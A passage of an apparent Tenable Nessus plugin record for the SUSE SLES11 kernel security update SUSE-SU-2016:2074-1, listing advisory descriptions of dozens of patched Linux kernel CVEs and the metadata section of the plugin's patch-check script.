use-after-free, and system crash) via a crafted ioctl call (bnc#967975).\n\n - CVE-2016-2545: The snd_timer_interrupt function in sound/core/timer.c in the Linux kernel did not properly maintain a certain linked list, which allowed local users to cause a denial of service (race condition and system crash) via a crafted ioctl call (bnc#967974).\n\n - CVE-2016-2544: Race condition in the queue_delete function in sound/core/seq/seq_queue.c in the Linux kernel allowed local users to cause a denial of service (use-after-free and system crash) by making an ioctl call at a certain time (bnc#967973).\n\n - CVE-2016-2543: The snd_seq_ioctl_remove_events function in sound/core/seq/seq_clientmgr.c in the Linux kernel did not verify FIFO assignment before proceeding with FIFO clearing, which allowed local users to cause a denial of service (NULL pointer dereference and OOPS) via a crafted ioctl call (bnc#967972).\n\n - CVE-2016-2384: Double free vulnerability in the snd_usbmidi_create function in sound/usb/midi.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (panic) or possibly have unspecified other impact via vectors involving an invalid USB descriptor (bnc#966693).\n\n - CVE-2015-8812: drivers/infiniband/hw/cxgb3/iwch_cm.c in the Linux kernel did not properly identify error conditions, which allowed remote attackers to execute arbitrary code or cause a denial of service (use-after-free) via crafted packets (bnc#966437).\n\n - CVE-2015-8785: The fuse_fill_write_pages function in fs/fuse/file.c in the Linux kernel allowed local users to cause a denial of service (infinite loop) via a writev system call that triggers a zero length for the first segment of an iov (bnc#963765).\n\n - CVE-2016-2069: Race condition in arch/x86/mm/tlb.c in the Linux kernel .4.1 allowed local users to gain privileges by triggering access to a paging structure by a different CPU (bnc#963767).\n\n - CVE-2016-0723: Race condition in the tty_ioctl function in drivers/tty/tty_io.c in the Linux kernel allowed local users to obtain sensitive information from kernel memory or cause a denial of service (use-after-free and system crash) by making a TIOCGETD ioctl call during processing of a TIOCSETD ioctl call (bnc#961500).\n\n - CVE-2013-7446: Use-after-free vulnerability in net/unix/af_unix.c in the Linux kernel allowed local users to bypass intended AF_UNIX socket permissions or cause a denial of service (panic) via crafted epoll_ctl calls (bnc#955654).\n\n - CVE-2015-8767: net/sctp/sm_sideeffect.c in the Linux kernel did not properly manage the relationship between a lock and a socket, which allowed local users to cause a denial of service (deadlock) via a crafted sctp_accept call (bnc#961509).\n\n - CVE-2015-7515: The aiptek_probe function in drivers/input/tablet/aiptek.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a crafted USB device that lacks endpoints (bnc#956708).\n\n - CVE-2015-8215: net/ipv6/addrconf.c in the IPv6 stack in the Linux kernel did not validate attempted changes to the MTU value, which allowed context-dependent attackers to cause a denial of service (packet loss) via a value that is (1) smaller than the minimum compliant value or (2) larger than the MTU of an interface, as demonstrated by a Router Advertisement (RA) message that is not validated by a daemon, a different vulnerability than CVE-2015-0272 (bnc#955354).\n\n - CVE-2015-7550: The keyctl_read_key function in security/keys/keyctl.c in the Linux kernel did not properly use a semaphore, which allowed local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact via a crafted application that leverages a race condition between keyctl_revoke and keyctl_read calls (bnc#958951).\n\n - CVE-2015-8569: The (1) pptp_bind and (2) pptp_connect functions in drivers/net/ppp/pptp.c in the Linux kernel did not verify an address length, which allowed local users to obtain sensitive information from kernel memory and bypass the KASLR protection mechanism via a crafted application (bnc#959190).\n\n - CVE-2015-8575: The sco_sock_bind function in net/bluetooth/sco.c in the Linux kernel did not verify an address length, which allowed local users to obtain sensitive information from kernel memory and bypass the KASLR protection mechanism via a crafted application (bnc#959399).\n\n - CVE-2015-8543: The networking implementation in the Linux kernel did not validate protocol identifiers for certain protocol families, which allowed local users to cause a denial of service (NULL function pointer dereference and system crash) or possibly gain privileges by leveraging CLONE_NEWUSER support to execute a crafted SOCK_RAW application (bnc#958886).\n\n - CVE-2015-8539: The KEYS subsystem in the Linux kernel allowed local users to gain privileges or cause a denial of service (BUG) via crafted keyctl commands that negatively instantiate a key, related to security/keys/encrypted-keys/encrypted.c, security/keys/trusted.c, and security/keys/user_defined.c (bnc#958463).\n\n - CVE-2015-7509: fs/ext4/namei.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (system crash) via a crafted no-journal filesystem, a related issue to CVE-2013-2015 (bnc#956709).\n\n - CVE-2015-7799: The slhc_init function in drivers/net/slip/slhc.c in the Linux kernel did not ensure that certain slot numbers are valid, which allowed local users to cause a denial of service (NULL pointer dereference and system crash) via a crafted PPPIOCSMAXCID ioctl call (bnc#949936).\n\n - CVE-2015-8104: The KVM subsystem in the Linux kernel allowed guest OS users to cause a denial of service (host OS panic or hang) by triggering many #DB (aka Debug) exceptions, related to svm.c (bnc#954404).\n\n - CVE-2015-5307: The KVM subsystem in the Linux kernel allowed guest OS users to cause a denial of service (host OS panic or hang) by triggering many #AC (aka Alignment Check) exceptions, related to svm.c and vmx.c (bnc#953527).\n\n - CVE-2015-7990: Race condition in the rds_sendmsg function in net/rds/sendmsg.c in the Linux kernel allowed local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact by using a socket that was not properly bound (bnc#952384).\n\n - CVE-2015-7872: The key_gc_unused_keys function in security/keys/gc.c in the Linux kernel allowed local users to cause a denial of service (OOPS) via crafted keyctl commands (bnc#951440).\n\n - CVE-2015-6937: The __rds_conn_create function in net/rds/connection.c in the Linux kernel allowed local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact by using a socket that was not properly bound (bnc#945825).\n\n - CVE-2015-6252: The vhost_dev_ioctl function in drivers/vhost/vhost.c in the Linux kernel allowed local users to cause a denial of service (memory consumption) via a VHOST_SET_LOG_FD ioctl call that triggers permanent file-descriptor allocation (bnc#942367).\n\n - CVE-2015-3339: Race condition in the prepare_binprm function in fs/exec.c in the Linux kernel allowed local users to gain privileges by executing a setuid program at a time instant when a chown to root is in progress, and the ownership is changed but the setuid bit is not yet stripped (bnc#928130).\n\nThe update package also includes non-security fixes. See advisory for details.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-09-02T00:00:00", "type": "nessus", "title": "SUSE SLES11 Security Update : kernel (SUSE-SU-2016:2074-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-2015", "CVE-2013-7446", "CVE-2015-0272", "CVE-2015-3339", "CVE-2015-5307", "CVE-2015-6252", "CVE-2015-6937", "CVE-2015-7509", "CVE-2015-7515", "CVE-2015-7550", "CVE-2015-7566", "CVE-2015-7799", "CVE-2015-7872", "CVE-2015-7990", "CVE-2015-8104", "CVE-2015-8215", "CVE-2015-8539", "CVE-2015-8543", "CVE-2015-8569", "CVE-2015-8575", "CVE-2015-8767", "CVE-2015-8785", "CVE-2015-8812", "CVE-2015-8816", "CVE-2016-0723", "CVE-2016-2069", "CVE-2016-2143", "CVE-2016-2184", "CVE-2016-2185", "CVE-2016-2186", "CVE-2016-2188", "CVE-2016-2384", "CVE-2016-2543", "CVE-2016-2544", "CVE-2016-2545", "CVE-2016-2546", "CVE-2016-2547", "CVE-2016-2548", "CVE-2016-2549", "CVE-2016-2782", "CVE-2016-2847", "CVE-2016-3134", "CVE-2016-3137", "CVE-2016-3138", "CVE-2016-3139", "CVE-2016-3140", "CVE-2016-3156", "CVE-2016-4486"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kernel-default", "p-cpe:/a:novell:suse_linux:kernel-default-base", "p-cpe:/a:novell:suse_linux:kernel-default-devel", "p-cpe:/a:novell:suse_linux:kernel-default-man", "p-cpe:/a:novell:suse_linux:kernel-ec2", "p-cpe:/a:novell:suse_linux:kernel-ec2-base", "p-cpe:/a:novell:suse_linux:kernel-ec2-devel", "p-cpe:/a:novell:suse_linux:kernel-pae", "p-cpe:/a:novell:suse_linux:kernel-pae-base", "p-cpe:/a:novell:suse_linux:kernel-pae-devel", "p-cpe:/a:novell:suse_linux:kernel-source", "p-cpe:/a:novell:suse_linux:kernel-syms", "p-cpe:/a:novell:suse_linux:kernel-trace", "p-cpe:/a:novell:suse_linux:kernel-trace-base", "p-cpe:/a:novell:suse_linux:kernel-trace-devel", "p-cpe:/a:novell:suse_linux:kernel-xen", "p-cpe:/a:novell:suse_linux:kernel-xen-base", "p-cpe:/a:novell:suse_linux:kernel-xen-devel", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_SU-2016-2074-1.NASL", "href": "https://www.tenable.com/plugins/nessus/93289", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:2074-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93289);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2013-2015\", \"CVE-2013-7446\", \"CVE-2015-0272\", \"CVE-2015-3339\", \"CVE-2015-5307\", \"CVE-2015-6252\", \"CVE-2015-6937\", \"CVE-2015-7509\", \"CVE-2015-7515\", \"CVE-2015-7550\", \"CVE-2015-7566\", \"CVE-2015-7799\", \"CVE-2015-7872\", \"CVE-2015-7990\", \"CVE-2015-8104\", \"CVE-2015-8215\", \"CVE-2015-8539\", \"CVE-2015-8543\", \"CVE-2015-8569\", \"CVE-2015-8575\", \"CVE-2015-8767\", \"CVE-2015-8785\", \"CVE-2015-8812\", \"CVE-2015-8816\", \"CVE-2016-0723\", \"CVE-2016-2069\", \"CVE-2016-2143\", \"CVE-2016-2184\", \"CVE-2016-2185\", \"CVE-2016-2186\", \"CVE-2016-2188\", \"CVE-2016-2384\", \"CVE-2016-2543\", \"CVE-2016-2544\", \"CVE-2016-2545\", \"CVE-2016-2546\", \"CVE-2016-2547\", \"CVE-2016-2548\", \"CVE-2016-2549\", \"CVE-2016-2782\", \"CVE-2016-2847\", \"CVE-2016-3134\", \"CVE-2016-3137\", \"CVE-2016-3138\", \"CVE-2016-3139\", \"CVE-2016-3140\", \"CVE-2016-3156\", \"CVE-2016-4486\");\n script_bugtraq_id(59512, 74243);\n\n script_name(english:\"SUSE SLES11 Security Update : kernel (SUSE-SU-2016:2074-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SUSE Linux Enterprise 11 SP2 kernel was updated to receive various\nsecurity and bug fixes. The following security bugs were fixed :\n\n - CVE-2016-4486: Fixed 4 byte information leak in\n net/core/rtnetlink.c (bsc#978822).\n\n - CVE-2016-3134: The netfilter subsystem in the Linux\n kernel did not validate certain offset fields, which\n allowed local users to gain privileges or cause a denial\n of service (heap memory corruption) via an\n IPT_SO_SET_REPLACE setsockopt call (bnc#971126).\n\n - CVE-2016-2847: fs/pipe.c in the Linux kernel did not\n limit the amount of unread data in pipes, which allowed\n local users to cause a denial of service (memory\n consumption) by creating many pipes with non-default\n sizes (bnc#970948).\n\n - CVE-2016-2188: The iowarrior_probe function in\n drivers/usb/misc/iowarrior.c in the Linux kernel allowed\n physically proximate attackers to cause a denial of\n service (NULL pointer dereference and system crash) via\n a crafted endpoints value in a USB device descriptor\n (bnc#970956).\n\n - CVE-2016-3138: The acm_probe function in\n drivers/usb/class/cdc-acm.c in the Linux kernel allowed\n physically proximate attackers to cause a denial of\n service (NULL pointer dereference and system crash) via\n a USB device without both a control and a data endpoint\n descriptor (bnc#970911).\n\n - CVE-2016-3137: drivers/usb/serial/cypress_m8.c in the\n Linux kernel allowed physically proximate attackers to\n cause a denial of service (NULL pointer dereference and\n system crash) via a USB device without both an\n interrupt-in and an interrupt-out endpoint descriptor,\n related to the cypress_generic_port_probe and\n cypress_open functions (bnc#970970).\n\n - CVE-2016-3140: The digi_port_init function in\n drivers/usb/serial/digi_acceleport.c in the Linux kernel\n allowed physically proximate attackers to cause a denial\n of service (NULL pointer dereference and system crash)\n via a crafted endpoints value in a USB device descriptor\n (bnc#970892).\n\n - CVE-2016-2186: The powermate_probe function in\n drivers/input/misc/powermate.c in the Linux kernel\n allowed physically proximate attackers to cause a denial\n of service (NULL pointer dereference and system crash)\n via a crafted endpoints value in a USB device descriptor\n (bnc#970958).\n\n - CVE-2016-2185: The ati_remote2_probe function in\n drivers/input/misc/ati_remote2.c in the Linux kernel\n allowed physically proximate attackers to cause a denial\n of service (NULL pointer dereference and system crash)\n via a crafted endpoints value in a USB device descriptor\n (bnc#971124).\n\n - CVE-2016-3156: The IPv4 implementation in the Linux\n kernel mishandles destruction of device objects, which\n allowed guest OS users to cause a denial of service\n (host OS networking outage) by arranging for a large\n number of IP addresses (bnc#971360).\n\n - CVE-2016-2184: The create_fixed_stream_quirk function in\n sound/usb/quirks.c in the snd-usb-audio driver in the\n Linux kernel allowed physically proximate attackers to\n cause a denial of service (NULL pointer dereference or\n double free, and system crash) via a crafted endpoints\n value in a USB device descriptor (bnc#971125).\n\n - CVE-2016-3139: The wacom_probe function in\n drivers/input/tablet/wacom_sys.c in the Linux kernel\n allowed physically proximate attackers to cause a denial\n of service (NULL pointer dereference and system crash)\n via a crafted endpoints value in a USB device descriptor\n (bnc#970909).\n\n - CVE-2016-2143: The fork implementation in the Linux\n kernel on s390 platforms mishandled the case of four\n page-table levels, which allowed local users to cause a\n denial of service (system crash) or possibly have\n unspecified other impact via a crafted application,\n related to arch/s390/include/asm/mmu_context.h and\n arch/s390/include/asm/pgalloc.h (bnc#970504).\n\n - CVE-2016-2782: The treo_attach function in\n drivers/usb/serial/visor.c in the Linux kernel allowed\n physically proximate attackers to cause a denial of\n service (NULL pointer dereference and system crash) or\n possibly have unspecified other impact by inserting a\n USB device that lacks a (1) bulk-in or (2) interrupt-in\n endpoint (bnc#968670).\n\n - CVE-2015-8816: The hub_activate function in\n drivers/usb/core/hub.c in the Linux kernel did not\n properly maintain a hub-interface data structure, which\n allowed physically proximate attackers to cause a denial\n of service (invalid memory access and system crash) or\n possibly have unspecified other impact by unplugging a\n USB hub device (bnc#968010).\n\n - CVE-2015-7566: The clie_5_attach function in\n drivers/usb/serial/visor.c in the Linux kernel allowed\n physically proximate attackers to cause a denial of\n service (NULL pointer dereference and system crash) or\n possibly have unspecified other impact by inserting a\n USB device that lacks a bulk-out endpoint (bnc#961512).\n\n - CVE-2016-2549: sound/core/hrtimer.c in the Linux kernel\n did not prevent recursive callback access, which allowed\n local users to cause a denial of service (deadlock) via\n a crafted ioctl call (bnc#968013).\n\n - CVE-2016-2547: sound/core/timer.c in the Linux kernel\n employed a locking approach that did not consider slave\n timer instances, which allowed local users to cause a\n denial of service (race condition, use-after-free, and\n system crash) via a crafted ioctl call (bnc#968011).\n\n - CVE-2016-2548: sound/core/timer.c in the Linux kernel\n retained certain linked lists after a close or stop\n action, which allowed local users to cause a denial of\n service (system crash) via a crafted ioctl call, related\n to the (1) snd_timer_close and (2) _snd_timer_stop\n functions (bnc#968012).\n\n - CVE-2016-2546: sound/core/timer.c in the Linux kernel\n used an incorrect type of mutex, which allowed local\n users to cause a denial of service (race condition,\n use-after-free, and system crash) via a crafted ioctl\n call (bnc#967975).\n\n - CVE-2016-2545: The snd_timer_interrupt function in\n sound/core/timer.c in the Linux kernel did not properly\n maintain a certain linked list, which allowed local\n users to cause a denial of service (race condition and\n system crash) via a crafted ioctl call (bnc#967974).\n\n - CVE-2016-2544: Race condition in the queue_delete\n function in sound/core/seq/seq_queue.c in the Linux\n kernel allowed local users to cause a denial of service\n (use-after-free and system crash) by making an ioctl\n call at a certain time (bnc#967973).\n\n - CVE-2016-2543: The snd_seq_ioctl_remove_events function\n in sound/core/seq/seq_clientmgr.c in the Linux kernel\n did not verify FIFO assignment before proceeding with\n FIFO clearing, which allowed local users to cause a\n denial of service (NULL pointer dereference and OOPS)\n via a crafted ioctl call (bnc#967972).\n\n - CVE-2016-2384: Double free vulnerability in the\n snd_usbmidi_create function in sound/usb/midi.c in the\n Linux kernel allowed physically proximate attackers to\n cause a denial of service (panic) or possibly have\n unspecified other impact via vectors involving an\n invalid USB descriptor (bnc#966693).\n\n - CVE-2015-8812: drivers/infiniband/hw/cxgb3/iwch_cm.c in\n the Linux kernel did not properly identify error\n conditions, which allowed remote attackers to execute\n arbitrary code or cause a denial of service\n (use-after-free) via crafted packets (bnc#966437).\n\n - CVE-2015-8785: The fuse_fill_write_pages function in\n fs/fuse/file.c in the Linux kernel allowed local users\n to cause a denial of service (infinite loop) via a\n writev system call that triggers a zero length for the\n first segment of an iov (bnc#963765).\n\n - CVE-2016-2069: Race condition in arch/x86/mm/tlb.c in\n the Linux kernel .4.1 allowed local users to gain\n privileges by triggering access to a paging structure by\n a different CPU (bnc#963767).\n\n - CVE-2016-0723: Race condition in the tty_ioctl function\n in drivers/tty/tty_io.c in the Linux kernel allowed\n local users to obtain sensitive information from kernel\n memory or cause a denial of service (use-after-free and\n system crash) by making a TIOCGETD ioctl call during\n processing of a TIOCSETD ioctl call (bnc#961500).\n\n - CVE-2013-7446: Use-after-free vulnerability in\n net/unix/af_unix.c in the Linux kernel allowed local\n users to bypass intended AF_UNIX socket permissions or\n cause a denial of service (panic) via crafted epoll_ctl\n calls (bnc#955654).\n\n - CVE-2015-8767: net/sctp/sm_sideeffect.c in the Linux\n kernel did not properly manage the relationship between\n a lock and a socket, which allowed local users to cause\n a denial of service (deadlock) via a crafted sctp_accept\n call (bnc#961509).\n\n - CVE-2015-7515: The aiptek_probe function in\n drivers/input/tablet/aiptek.c in the Linux kernel\n allowed physically proximate attackers to cause a denial\n of service (NULL pointer dereference and system crash)\n via a crafted USB device that lacks endpoints\n (bnc#956708).\n\n - CVE-2015-8215: net/ipv6/addrconf.c in the IPv6 stack in\n the Linux kernel did not validate attempted changes to\n the MTU value, which allowed context-dependent attackers\n to cause a denial of service (packet loss) via a value\n that is (1) smaller than the minimum compliant value or\n (2) larger than the MTU of an interface, as demonstrated\n by a Router Advertisement (RA) message that is not\n validated by a daemon, a different vulnerability than\n CVE-2015-0272 (bnc#955354).\n\n - CVE-2015-7550: The keyctl_read_key function in\n security/keys/keyctl.c in the Linux kernel did not\n properly use a semaphore, which allowed local users to\n cause a denial of service (NULL pointer dereference and\n system crash) or possibly have unspecified other impact\n via a crafted application that leverages a race\n condition between keyctl_revoke and keyctl_read calls\n (bnc#958951).\n\n - CVE-2015-8569: The (1) pptp_bind and (2) pptp_connect\n functions in drivers/net/ppp/pptp.c in the Linux kernel\n did not verify an address length, which allowed local\n users to obtain sensitive information from kernel memory\n and bypass the KASLR protection mechanism via a crafted\n application (bnc#959190).\n\n - CVE-2015-8575: The sco_sock_bind function in\n net/bluetooth/sco.c in the Linux kernel did not verify\n an address length, which allowed local users to obtain\n sensitive information from kernel memory and bypass the\n KASLR protection mechanism via a crafted application\n (bnc#959399).\n\n - CVE-2015-8543: The networking implementation in the\n Linux kernel did not validate protocol identifiers for\n certain protocol families, which allowed local users to\n cause a denial of service (NULL function pointer\n dereference and system crash) or possibly gain\n privileges by leveraging CLONE_NEWUSER support to\n execute a crafted SOCK_RAW application (bnc#958886).\n\n - CVE-2015-8539: The KEYS subsystem in the Linux kernel\n allowed local users to gain privileges or cause a denial\n of service (BUG) via crafted keyctl commands that\n negatively instantiate a key, related to\n security/keys/encrypted-keys/encrypted.c,\n security/keys/trusted.c, and\n security/keys/user_defined.c (bnc#958463).\n\n - CVE-2015-7509: fs/ext4/namei.c in the Linux kernel\n allowed physically proximate attackers to cause a denial\n of service (system crash) via a crafted no-journal\n filesystem, a related issue to CVE-2013-2015\n (bnc#956709).\n\n - CVE-2015-7799: The slhc_init function in\n drivers/net/slip/slhc.c in the Linux kernel did not\n ensure that certain slot numbers are valid, which\n allowed local users to cause a denial of service (NULL\n pointer dereference and system crash) via a crafted\n PPPIOCSMAXCID ioctl call (bnc#949936).\n\n - CVE-2015-8104: The KVM subsystem in the Linux kernel\n allowed guest OS users to cause a denial of service\n (host OS panic or hang) by triggering many #DB (aka\n Debug) exceptions, related to svm.c (bnc#954404).\n\n - CVE-2015-5307: The KVM subsystem in the Linux kernel\n allowed guest OS users to cause a denial of service\n (host OS panic or hang) by triggering many #AC (aka\n Alignment Check) exceptions, related to svm.c and vmx.c\n (bnc#953527).\n\n - CVE-2015-7990: Race condition in the rds_sendmsg\n function in net/rds/sendmsg.c in the Linux kernel\n allowed local users to cause a denial of service (NULL\n pointer dereference and system crash) or possibly have\n unspecified other impact by using a socket that was not\n properly bound (bnc#952384).\n\n - CVE-2015-7872: The key_gc_unused_keys function in\n security/keys/gc.c in the Linux kernel allowed local\n users to cause a denial of service (OOPS) via crafted\n keyctl commands (bnc#951440).\n\n - CVE-2015-6937: The __rds_conn_create function in\n net/rds/connection.c in the Linux kernel allowed local\n users to cause a denial of service (NULL pointer\n dereference and system crash) or possibly have\n unspecified other impact by using a socket that was not\n properly bound (bnc#945825).\n\n - CVE-2015-6252: The vhost_dev_ioctl function in\n drivers/vhost/vhost.c in the Linux kernel allowed local\n users to cause a denial of service (memory consumption)\n via a VHOST_SET_LOG_FD ioctl call that triggers\n permanent file-descriptor allocation (bnc#942367).\n\n - CVE-2015-3339: Race condition in the prepare_binprm\n function in fs/exec.c in the Linux kernel allowed local\n users to gain privileges by executing a setuid program\n at a time instant when a chown to root is in progress,\n and the ownership is changed but the setuid bit is not\n yet stripped (bnc#928130).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=816446\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=861093\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=928130\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935757\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=939826\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=942367\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=945825\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=946117\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=946309\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=948562\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=949744\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=949936\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=951440\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=952384\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=953527\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=954404\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=955354\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=955654\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=956708\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=956709\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=958463\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=958886\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=958951\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=959190\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=959399\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=961500\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=961509\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=961512\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=963765\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=963767\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=964201\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=966437\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=966460\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=966662\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=966693\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=967972\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=967973\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=967974\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=967975\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968010\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968011\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968012\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968013\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968670\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970504\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970892\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970909\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970911\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970948\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970956\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970958\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970970\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971124\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971125\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971126\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971360\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=972510\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=973570\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=975945\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=977847\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=978822\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2013-2015/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2013-7446/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-0272/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-3339/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-5307/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-6252/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-6937/\"\n );\n 